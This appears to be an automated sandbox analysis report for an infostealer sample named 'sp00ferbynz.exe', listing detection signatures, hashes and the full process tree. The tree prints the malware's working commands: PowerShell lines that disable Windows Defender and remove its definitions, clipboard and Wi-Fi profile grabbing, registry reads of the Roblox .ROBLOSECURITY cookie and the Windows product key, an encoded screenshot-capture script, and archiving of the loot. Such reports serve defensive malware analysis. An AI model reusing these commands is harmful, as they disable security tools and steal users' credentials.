Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-10-2024 15:40

General

  • Target

    sp00ferbynz.exe

  • Size

    7.4MB

  • MD5

    40b884fff18892ac99fcd1d0f01a01ff

  • SHA1

    7e538a902b3db7276fb3bae259c0b6751f52c080

  • SHA256

    6bafdb1ed8770dc2aa1f5c4065608efd579852f315fd26ee1a147e7be4791443

  • SHA512

    4e07b2593e331b01205bd2c35a4acce793e7c5a31007847c335346ebb22d3da1548994e26f122392ede9c2e702fa7fb552e693580703a2ad927d59c4fef7e608

  • SSDEEP

    196608:q3YShEvUOshoKMuIkhVastRL5Di3uV1DVA:aYSy8OshouIkPftRL54u3A

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 61 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sp00ferbynz.exe
    "C:\Users\Admin\AppData\Local\Temp\sp00ferbynz.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2616
    • C:\Users\Admin\AppData\Local\Temp\sp00ferbynz.exe
      "C:\Users\Admin\AppData\Local\Temp\sp00ferbynz.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1116
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sp00ferbynz.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4884
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sp00ferbynz.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4060
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:396
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4644
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2576
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3144
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2064
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4516
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4028
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4288
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3160
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:5028
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1612
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4692
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5008
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4464
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:244
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:4520
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:4616
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4560
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:4916
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3992
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4068
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4ghqszsp\4ghqszsp.cmdline"
              5⤵
                PID:2324
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99DE.tmp" "c:\Users\Admin\AppData\Local\Temp\4ghqszsp\CSC77A93DC0FE8B4F9A937F25A613FE90B8.TMP"
                  6⤵
                    PID:1380
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3140
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:4376
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4792
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:1516
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4852
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:988
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:244
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:4448
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:4524
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:4752
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                            3⤵
                              PID:764
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4196
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:1404
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1004
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "getmac"
                                3⤵
                                  PID:4500
                                  • C:\Windows\system32\getmac.exe
                                    getmac
                                    4⤵
                                      PID:1664
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI26162\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\M1Ey6.zip" *"
                                    3⤵
                                      PID:3328
                                      • C:\Users\Admin\AppData\Local\Temp\_MEI26162\rar.exe
                                        C:\Users\Admin\AppData\Local\Temp\_MEI26162\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\M1Ey6.zip" *
                                        4⤵
                                        • Executes dropped EXE
                                        PID:3396
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                      3⤵
                                        PID:2176
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic os get Caption
                                          4⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4404
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                        3⤵
                                          PID:4412
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic computersystem get totalphysicalmemory
                                            4⤵
                                              PID:1464
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                            3⤵
                                              PID:4516
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic csproduct get uuid
                                                4⤵
                                                  PID:4824
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                3⤵
                                                  PID:3704
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4692
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                  3⤵
                                                    PID:1368
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic path win32_VideoController get name
                                                      4⤵
                                                      • Detects videocard installed
                                                      PID:3160
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                    3⤵
                                                      PID:2864
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4152

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  3KB

                                                  MD5

                                                  8740e7db6a0d290c198447b1f16d5281

                                                  SHA1

                                                  ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                  SHA256

                                                  f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                  SHA512

                                                  d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  e243a38635ff9a06c87c2a61a2200656

                                                  SHA1

                                                  ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

                                                  SHA256

                                                  af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

                                                  SHA512

                                                  4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  d28a889fd956d5cb3accfbaf1143eb6f

                                                  SHA1

                                                  157ba54b365341f8ff06707d996b3635da8446f7

                                                  SHA256

                                                  21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                  SHA512

                                                  0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

